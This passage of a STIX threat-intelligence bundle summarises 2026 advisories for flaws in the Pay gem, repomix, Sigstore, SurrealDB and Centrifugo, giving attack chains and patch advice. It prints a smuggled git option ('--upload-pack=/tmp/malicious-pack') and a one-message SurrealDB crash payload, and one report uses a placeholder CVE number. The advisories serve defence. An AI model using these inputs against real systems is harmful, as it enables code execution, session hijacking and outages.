attacker can use this timing oracle to accurately reconstruct the full 64-character hex-encoded SHA-256 HMAC, byte by byte, for a known payload.\n5.  **Forging Webhooks:** Once the HMAC signing secret is effectively known (as the HMAC for any given payload can be computed), the attacker can generate valid `Paddle-Signature` headers for arbitrary Paddle Billing webhook payloads that they construct.\n6.  **Impact (Business Logic Abuse):** The attacker then delivers these forged webhook events (e.g., `subscription.created`, `transaction.completed`, `invoice.paid`) to the `/pay/webhooks/paddle_billing` endpoint. The vulnerable application processes these forged events as legitimate, leading to unauthorized actions such as provisioning premium features for free, initiating fraudulent refunds, or triggering false customer notifications and database updates.\n\n## Impact\n\nThis vulnerability (CWE-208: Observable Timing Discrepancy) allows an unauthenticated attacker to fully compromise the integrity of Paddle Billing webhook events. By recovering the HMAC signing secret through a timing side-channel, attackers can forge any webhook event, effectively tricking the application into believing Paddle Billing sent it. This can lead to significant financial losses through fraudulent transactions (e.g., free access to paid features, unauthorized refunds), customer confusion from incorrect notifications, or data integrity issues due to malicious updates to billing states. Since the webhook endpoint must be internet-reachable by design, all `Pay` gem installations integrating with Paddle Billing are exposed to this risk. No specific victim counts or sectors were identified in the source, but any organization using the affected `Pay` gem version is at risk.\n\n## Recommendation\n\n*   Immediately update the `pay` gem to a version greater than `11.6.1` to apply the fix that replaces the non-constant-time `String#==` comparison with `ActiveSupport::SecurityUtils.secure_compare`.\n*   Review application logs for the `/pay/webhooks/paddle_billing` endpoint for unusually high request volumes from single IP addresses or abnormal response time distributions, which could indicate attempts at timing side-channel exploitation.\n*   Review application-level audit logs for the `Pay` gem for any anomalous `subscription.created`, `transaction.completed`, or other financial event entries around the time of the vulnerability disclosure or patch deployment, as these could indicate forged events delivered by an attacker.\n",
      "published": "2026-07-03T12:39:17Z",
      "labels": [
        "timing-attack",
        "vulnerability",
        "webhooks",
        "ruby-on-rails",
        "server-side",
        "logic-error",
        "remote-code-execution"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-mjgf-xj26-9qf9"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b1ed3b55-10e5-5ec4-8bb9-89ad7f4555a9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--734fb7fa-8f87-5bc4-b106-dde2f0db6893",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--135592d5-54f8-5b11-a54f-0b0c9ae1d42d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--734fb7fa-8f87-5bc4-b106-dde2f0db6893",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--734fb7fa-8f87-5bc4-b106-dde2f0db6893",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "repomix CLI Command Injection (RCE) via --remote-branch (CVE-2026-49987)",
      "description": "## Overview\n\nThe `repomix` CLI tool, a utility for managing repositories, contains a critical command injection vulnerability (CVE-2026-49987) in versions prior to 1.14.1. Discovered by Abhijith S. (@kakashi-kx), this flaw stems from improper handling of the `--remote-branch` argument within the `src/core/git/gitCommand.ts` file. User-controlled input for `--remote-branch` is passed directly to `git fetch` and `git checkout` subprocesses via `child_process.execFileAsync` without proper sanitization or the use of `--` positional delimiters. This allows an attacker to inject arbitrary `git` command-line options, notably `--upload-pack`, alongside SSH or local remote URLs. The vulnerability effectively bypasses an existing `dangerousParams` blocklist designed to prevent such attacks, as this validation was not applied to the `remoteBranch` parameter. Successful exploitation grants remote code execution capabilities, enabling an attacker to compromise systems running `repomix` with the privileges of the executing user, making CI/CD environments a significant target.\n\n## Attack Chain\n\n1.  An attacker invokes the `repomix` CLI tool, likely through a script or automated process.\n2.  The attacker supplies a specially crafted `--remote-branch` argument, for example, `--upload-pack=/tmp/malicious-pack`, to inject malicious options into the `git` command.\n3.  `repomix`'s `execGitShallowClone` function in `src/core/git/gitCommand.ts` is called internally.\n4.  The malicious `--remote-branch` argument, containing the injected `--upload-pack` option, is passed unsanitized to `deps.execFileAsync` which executes `git fetch`.\n5.  The `git` process interprets `--upload-pack=/tmp/malicious-pack` as a valid argument to specify an alternate program for `upload-pack` operations.\n6.  `git` attempts to invoke the attacker-controlled binary or script, such as `/tmp/malicious-pack`, as part of its transport helper process.\n7.  The `/tmp/malicious-pack` script executes arbitrary commands (e.g., `id \u003e\u003e /tmp/repomix-pwned.txt`) on the compromised system.\n8.  Remote Code Execution is achieved, allowing the attacker to run commands with the privileges of the user who executed `repomix`.\n\n## Impact\n\nThe primary impact of CVE-2026-49987 is remote code execution (RCE) on the system where `repomix` is executed. This grants attackers complete system compromise capabilities with the privileges of the running user. A significant concern is the potential compromise of CI/CD environments; if `repomix` is used in automated pipelines and its `--remote-branch` parameter is populated by external or untrusted triggers (e.g., webhook payloads, pull request titles), attackers can leverage this vulnerability to gain control of build servers. This could lead to exfiltration of sensitive data, deployment of malicious code, or further lateral movement within an organization's infrastructure.\n\n## Recommendation\n\n*   Update `repomix` to version 1.14.1 or later immediately to patch CVE-2026-49987.\n*   Deploy the provided Sigma rule to detect `git` process creation with suspicious `--upload-pack` arguments.\n*   Ensure `process_creation` logging for Linux systems is enabled and configured to capture command-line arguments to activate the detection rule.\n*   Review any CI/CD pipelines or automated workflows that utilize `repomix` and where the `--remote-branch` parameter might be populated by untrusted or external input.\n",
      "published": "2026-07-03T12:38:08Z",
      "labels": [
        "command-injection",
        "rce",
        "git",
        "supply-chain",
        "dependency",
        "linux"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-9mm9-rqhj-j5mx"
        }
      ],
      "confidence": 80
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--3284ab01-4ca2-552b-88af-2f65b5655649",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Sigstore `certificateOIDs` Verification Bypass Vulnerability (CVE-2026-48815)",
      "description": "## Overview\n\nA significant security vulnerability, identified as CVE-2026-48815, affects the `npm/sigstore` JavaScript library in versions up to and including 4.1.0. This flaw stems from a critical oversight in the library's certificate verification logic: while the public `sigstore.verify()` API accepts the `certificateOIDs` option, which is intended to enforce specific object identifiers (OIDs) within a certificate's extensions, this constraint is silently dropped during policy construction. Consequently, applications that rely on `certificateOIDs` to restrict accepted certificates for artifact signing are left without this crucial protection. An attacker could exploit this by presenting a certificate lacking the expected OIDs, yet still satisfying other verification checks, thereby bypassing a key policy enforcement mechanism and potentially enabling the trust of unauthorized or malicious software artifacts in a supply chain.\n\n## Attack Chain\n\n1.  **Attacker crafts malicious artifact**: An attacker creates a malicious software package or artifact intended for distribution.\n2.  **Attacker obtains unauthorized signing certificate**: The attacker acquires a certificate that meets general validity criteria (e.g., correct issuer, valid dates) but *lacks* specific critical OID extensions that the target application's `sigstore` configuration *intends* to enforce via `certificateOIDs`.\n3.  **Attacker signs malicious artifact**: The attacker signs the malicious artifact using their unauthorized certificate.\n4.  **Target system attempts to verify artifact**: A target system, using a vulnerable `npm/sigstore` library (\u003c= 4.1.0) and configured with `certificateOIDs` to enforce specific OID policies, attempts to verify the signed artifact.\n5.  **`sigstore` silently drops OID constraints**: Due to the vulnerability, the `npm/sigstore` library's `createVerificationPolicy()` function silently ignores the `certificateOIDs` parameter when constructing the verification policy.\n6.  **Artifact falsely deemed legitimate**: The signed malicious artifact passes `sigstore` verification because the critical OID extension check, which should have rejected the unauthorized certificate, was never applied.\n7.  **Malicious artifact executed/deployed**: The target system proceeds to trust and potentially execute or deploy the malicious artifact, believing it to be legitimately signed and compliant with its security policies.\n\n## Impact\n\nApplications integrating the `npm/sigstore` library that depend on the `certificateOIDs` feature for robust certificate policy enforcement are rendered vulnerable to supply chain attacks. This vulnerability means that unauthorized or non-compliant certificates, which should be explicitly rejected based on missing or incorrect OID extensions, will instead be accepted by the verification process. The direct consequence is that organizations relying on this library for software supply chain integrity could inadvertently trust and deploy malicious artifacts. This could lead to a wide range of impacts, including system compromise, data exfiltration, or the introduction of backdoors, undermining the entire purpose of artifact signing and verification. The exact number of affected organizations is difficult to ascertain, but any user of `npm/sigstore` up to version 4.1.0 configured with `certificateOIDs` is at risk.\n\n## Recommendation\n\n*   **Patch CVE-2026-48815 immediately**: Upgrade `npm/sigstore` to a patched version (4.1.1 or later) to address CVE-2026-48815, ensuring `certificateOIDs` are correctly enforced during verification.\n*   **Review `sigstore` configurations**: Audit all `sigstore.verify()` and `createVerifier()` calls in your codebase to confirm that certificate validation logic correctly identifies and rejects certificates that do not meet expected OID constraints, even after patching.\n",
      "published": "2026-07-03T12:37:11Z",
      "labels": [
        "vulnerability",
        "supply-chain",
        "software-security",
        "javascript",
        "npm",
        "code-signing"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-52v5-jr5w-gjxr"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--192bfa80-7271-5f3e-a00f-414fecda6055",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--820c1baa-de13-5d75-bb3b-5ff6ea5bae64",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Use Alternate Authentication Material",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1550",
          "url": "https://attack.mitre.org/techniques/T1550"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f799c2d2-08c2-55c7-a9f9-c845bf6a6b8b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--820c1baa-de13-5d75-bb3b-5ff6ea5bae64",
      "target_ref": "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--050ea383-848e-569e-b1e2-1679cecf2ef3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--820c1baa-de13-5d75-bb3b-5ff6ea5bae64",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ea82b60a-61e9-5d12-9e7e-7b2da9d5be02",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--820c1baa-de13-5d75-bb3b-5ff6ea5bae64",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--04d4258e-585d-5122-b73b-f4d16db72d6b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--820c1baa-de13-5d75-bb3b-5ff6ea5bae64",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--820c1baa-de13-5d75-bb3b-5ff6ea5bae64",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "SurrealDB HTTP /rpc Session Hijack Vulnerability",
      "description": "## Overview\n\nAnonymous attackers can exploit a critical vulnerability in SurrealDB’s HTTP `/rpc` endpoint, specifically affecting versions prior to 3.1.0. The flaw allows an unauthenticated caller to invoke the `sessions` method, which inadvertently returns all attached session UUIDs. Furthermore, the `/rpc` handler failed to perform ownership checks when a client-supplied session ID was present in a request. This combination enables an attacker to enumerate valid session identifiers and then impersonate any authenticated session by injecting a stolen UUID into subsequent requests. This vulnerability is particularly impactful for applications using the official Rust SDK’s `Http`/`Https` engine, as it automatically attaches sessions, making them enumerable and hijackable. Successful exploitation grants the attacker the full privileges of the hijacked session, including read, write, and delete capabilities over database data, as well as metadata exfiltration and privilege escalation.\n\n## Attack Chain\n\n1.  An anonymous attacker sends an unauthenticated HTTP GET or POST request to the SurrealDB `/rpc` endpoint, invoking the `sessions` method.\n2.  The vulnerable SurrealDB server (versions \u003c 3.1.0) responds to the unauthenticated request by returning a list of all currently attached session UUIDs.\n3.  The attacker parses the server's response to extract one or more valid, potentially authenticated, session UUIDs.\n4.  The attacker crafts a subsequent HTTP POST request to the `/rpc` endpoint, including a stolen session UUID within the `session` field of the request body or header.\n5.  The vulnerable SurrealDB server processes this request without performing an ownership check, associating the incoming request with the privileges and context of the hijacked session.\n6.  The attacker leverages the hijacked session's privileges to execute arbitrary database operations (e.g., read, write, or delete data), dump sensitive metadata, invalidate other sessions, or perform other actions commensurate with the compromised session's access level, potentially escalating to root.\n\n## Impact\n\nSuccessful exploitation allows an unauthenticated attacker to completely hijack any attached and authenticated SurrealDB session. This leads to unauthorized data access, modification, and deletion for any data the compromised session can reach. Attackers can also exfiltrate sensitive database metadata, invalidate legitimate user sessions, and achieve privilege escalation up to the highest level associated with the hijacked session, potentially gaining root access to the database. The breadth of impact depends directly on the privileges of the stolen session, posing a significant risk to data integrity, confidentiality, and availability for affected SurrealDB deployments.\n\n## Recommendation\n\n*   Upgrade all SurrealDB instances to version 3.1.0 or later immediately to patch the vulnerability described in this brief.\n*   If immediate upgrade is not possible, modify application logic to avoid client flows that call `attach` against HTTP `/rpc`, as detailed in the workarounds section of this brief, prioritizing WebSocket transport or REST endpoints.\n*   Implement network-level access controls to restrict direct access to the `/rpc` endpoint to only trusted internal clients, as described in the workaround for this vulnerability.\n",
      "published": "2026-07-03T12:36:18Z",
      "labels": [
        "surrealdb",
        "vulnerability",
        "session-hijack",
        "web-application",
        "rpc",
        "database"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-5qfp-32cf-69jh"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b4679072-0ec0-5d89-901a-39958ebb2768",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c37ffe36-ed6b-544d-931f-3dd7eaf34167",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--c37ffe36-ed6b-544d-931f-3dd7eaf34167",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "SurrealDB HTTP RPC Session Race Condition Allows Privilege Escalation",
      "description": "## Overview\n\nSurrealDB, a multi-model database, is affected by a critical time-of-check/time-of-use (TOCTOU) race condition (CVE-2024-XXXX, though not explicitly numbered in source) within its HTTP `/rpc` endpoint. This vulnerability impacts versions prior to `v3.1.0` and allows an unauthenticated attacker to escalate privileges. The flaw stems from concurrent requests sharing mutable authentication state; an unauthenticated request can race to inherit the session context of a legitimate, concurrently executing authenticated request. This mechanism, affecting the primary interface used by all official SurrealDB SDKs, allows attackers to bypass authentication and execute actions with the hijacked user's permissions, potentially leading to complete compromise of the SurrealDB instance if a root or namespace-level session is targeted.\n\n## Attack Chain\n\n1.  An authenticated user sends a legitimate `POST` request to the `/rpc` endpoint of a vulnerable SurrealDB instance.\n2.  During the processing of this legitimate request, the server temporarily sets its internal, shared session state to the authenticated user's context.\n3.  An unauthenticated attacker, with network access to the `/rpc` endpoint, concurrently sends a `POST` request to the same `/rpc` endpoint.\n4.  Due to the TOCTOU race condition, the attacker's unauthenticated request is processed while the internal session state still holds the authenticated user's context.\n5.  The attacker's request incorrectly inherits the session and privileges of the legitimate, authenticated user.\n6.  The attacker's request is then executed with the elevated privileges of the hijacked session, bypassing authentication.\n7.  If the hijacked session belonged to a root or namespace-level user, the attacker gains full control over the database, including reading, modifying, or deleting any data and creating persistent namespace-level users.\n8.  If the hijacked session belonged to a scoped record user, the attacker's actions are limited to that user's defined permissions.\n\n## Impact\n\nAn unauthenticated attacker exploiting this race condition can achieve privilege escalation within the SurrealDB instance. The severity of the impact is directly tied to the privileges of the authenticated user whose session is hijacked. If a highly privileged user, such as a root or namespace-level administrator, has their session compromised, the attacker can gain complete control over the database, including the ability to read, modify, or delete any data, as well as create new persistent users at the namespace level. This could lead to data integrity loss, unauthorized data access, and persistent compromise of the database environment.\n\n## Recommendation\n\n*   Upgrade SurrealDB instances to version `3.1.0` or newer immediately to apply the patch that introduces per-request session isolation.\n*   Implement network-level controls (e.g., firewall rules, WAFs) to restrict access to the `/rpc` endpoint to only trusted clients and applications, reducing the exposure surface.\n",
      "published": "2026-07-03T12:35:23Z",
      "labels": [
        "privilege-escalation",
        "race-condition",
        "webserver",
        "surrealdb"
      ],
      "object_refs": [
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-4vgr-h27g-cf9p"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6ca3f667-4366-5245-9967-5151246f66f0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d9961a49-8e38-520b-aa5a-137943b18ee9",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--d9961a49-8e38-520b-aa5a-137943b18ee9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unauthenticated Remote Denial-of-Service in SurrealDB via Malformed RPC `use` Call",
      "description": "## Overview\n\nA critical unauthenticated remote denial-of-service vulnerability has been identified in SurrealDB, affecting versions prior to 3.1.0. This flaw, tracked as GHSA-wjjj-24cx-f28g, allows an unauthenticated attacker to crash the database server by sending a single malformed WebSocket message to the `/rpc` endpoint. Specifically, sending a `use { db: \"x\" }` command without first selecting a namespace triggers an unhandled assertion within the `surrealdb-core` library. Due to the compilation setting `panic = 'abort'`, this assertion error forces the entire SurrealDB process to terminate, leading to an immediate denial of service. The vulnerability requires no credentials, authentication tokens, session knowledge, or the `--allow-guests` flag, making it trivial to exploit. This poses a significant risk to the availability of SurrealDB deployments, as any reachable server can be taken offline with minimal effort.\n\n## Attack Chain\n\n1. An unauthenticated remote attacker establishes a WebSocket connection to the target SurrealDB server's `/rpc` endpoint.\n2. The attacker crafts and sends a malformed JSON-RPC `use` command within a WebSocket message, such as `{\"id\":\"1\",\"method\":\"use\",\"params\":{\"db\":\"x\"}}`, to the connected endpoint.\n3. The SurrealDB server receives the `use` message, which attempts to select a database (`db`) without an active namespace (`ns`) being previously set or implied.\n4. The server's internal `use` handler, lacking a valid namespace, encounters an unexpected state during processing.\n5. This unexpected state triggers an `.expect(\"namespace should be set\")` assertion in the `surrealdb-core` library code.\n6. Due to the `panic = 'abort'` build configuration of `surrealdb-core`, the assertion failure causes an immediate and unrecoverable panic within the server process.\n7. The SurrealDB server process terminates abruptly, resulting in a denial-of-service condition for all connected clients and applications.\n\n## Impact\n\nAn unauthenticated remote attacker who could reach the `/rpc` endpoint could crash the SurrealDB server with a single WebSocket message. No credentials, token, session knowledge, or capability are required. This results in immediate service disruption and unavailability of the database, severely affecting any applications or services dependent on SurrealDB. The simplicity of the attack means that systems exposed to the internet are at high risk of being taken offline.\n\n## Recommendation\n\n*   Upgrade SurrealDB servers to version 3.1.0 or later immediately to patch the vulnerability identified in GHSA-wjjj-24cx-f28g.\n*   Restrict network access to the `/rpc` endpoint to only trusted clients as a workaround if immediate patching to version 3.1.0 is not possible.\n*   Deploy a process supervisor for SurrealDB instances to automatically restart the server if it crashes due to this or similar issues, minimizing downtime.\n",
      "published": "2026-07-03T12:29:04Z",
      "labels": [
        "denial-of-service",
        "vulnerability",
        "websocket",
        "surrealdb"
      ],
      "object_refs": [
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-wjjj-24cx-f28g"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fddb0cb3-4030-536c-b139-7fdd3881f156",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--39aa3b38-f713-5b4f-8091-2bfcabbfe1f0",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Use Alternate Authentication Material",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1550",
          "url": "https://attack.mitre.org/techniques/T1550"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f927c807-10ef-5bf5-a0be-a5a06dacbc80",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--39aa3b38-f713-5b4f-8091-2bfcabbfe1f0",
      "target_ref": "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--39aa3b38-f713-5b4f-8091-2bfcabbfe1f0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Centrifugo JWKS Cache Authentication Bypass",
      "description": "## Overview\n\nA severe authentication bypass vulnerability affects Centrifugo v6, a real-time messaging server, specifically within its dynamic JSON Web Key Set (JWKS) endpoint feature. This flaw, not yet assigned a CVE, enables an attacker to gain unauthorized access to one tenant's resources by exploiting a valid token from a separate, distinct tenant. The vulnerability stems from Centrifugo's JWKS key cache and `singleflight` mechanism, which are keyed solely by the `kid` (key ID) value from a JWT header, rather than a combination of the `kid` and the resolved JWKS endpoint, issuer, or audience. This design oversight means that if an attacker can ensure their issuer's key, sharing a `kid` with another target tenant, is cached first, they can forge JWTs for users within the target tenant. This leads to unauthorized connection and subscription token acceptance, posing a significant risk to multi-tenant Centrifugo deployments using dynamic JWKS configurations.\n\n## Attack Chain\n\n1.  **Initial Token Acquisition**: An attacker obtains or mints a valid JWT for an authorized issuer/tenant (e.g., Tenant A) with a specific `kid` value in its header. This JWT is signed by Tenant A's private key.\n2.  **Cache Priming (Tenant A)**: The attacker presents Tenant A's valid JWT to the Centrifugo server, triggering the dynamic JWKS endpoint to fetch Tenant A's public key corresponding to the JWT's `kid`. This public key is then stored in Centrifugo's JWKS cache, indexed only by the `kid`.\n3.  **Token Forgery (Tenant B)**: The attacker crafts a new JWT, claiming to be a user in a different target issuer/tenant (e.g., Tenant B), but importantly, uses the *same `kid`* value in the header and signs it with *Tenant A's private key*.\n4.  **Forged Token Presentation**: The attacker presents this forged Tenant B JWT to the Centrifugo server for authentication (e.g., connection or subscription verification).\n5.  **Vulnerable Cache Lookup**: Centrifugo attempts to verify the forged Tenant B JWT. When performing the JWKS key lookup, it queries its cache using only the `kid` from the forged token.\n6.  **Cross-Tenant Key Reuse**: Because the `kid` matches the key previously cached for Tenant A, Centrifugo retrieves and uses Tenant A's public key (instead of Tenant B's intended key) to verify the forged Tenant B token.\n7.  **Authentication Bypass**: Since the forged token was signed by Tenant A's private key and verified by Tenant A's public key (due to the cache hit), the verification succeeds, granting the attacker unauthorized access as the claimed user in Tenant B.\n8.  **Impact**: The attacker achieves unauthorized connection or subscription to Tenant B's services, leading to data exposure, unauthorized actions, and compromise of integrity or confidentiality within the target tenant.\n\n## Impact\n\nThis vulnerability results in a cross-issuer/cross-tenant JWT authentication bypass in Centrifugo deployments configured to use dynamic JWKS endpoints. The primary impact is unauthorized access, allowing an attacker who can acquire or forge a token for one tenant to impersonate users in another tenant if both share a `kid` value and the attacker's key is cached first. This directly compromises the integrity of connection and subscription token verification. Consequences include unauthorized user authentication within a different namespace and potential cross-tenant confidentiality and integrity breaches, as the server incorrectly trusts tokens across isolated trust domains, particularly in multi-tenant environments where `iss` or `aud` claims are used to derive dynamic JWKS URLs.\n\n## Recommendation\n\n*   **Patch Centrifugo**: Immediately apply any available patches or updates from the vendor (Centrifugal) that address this JWKS caching vulnerability.\n*   **Review JWKS Configuration**: Reconfigure Centrifugo to avoid dynamic JWKS endpoint templates that rely solely on `kid` for key identification across different trust domains, if a patch is not immediately available.\n*   **Audit JWKS `kid` Usage**: 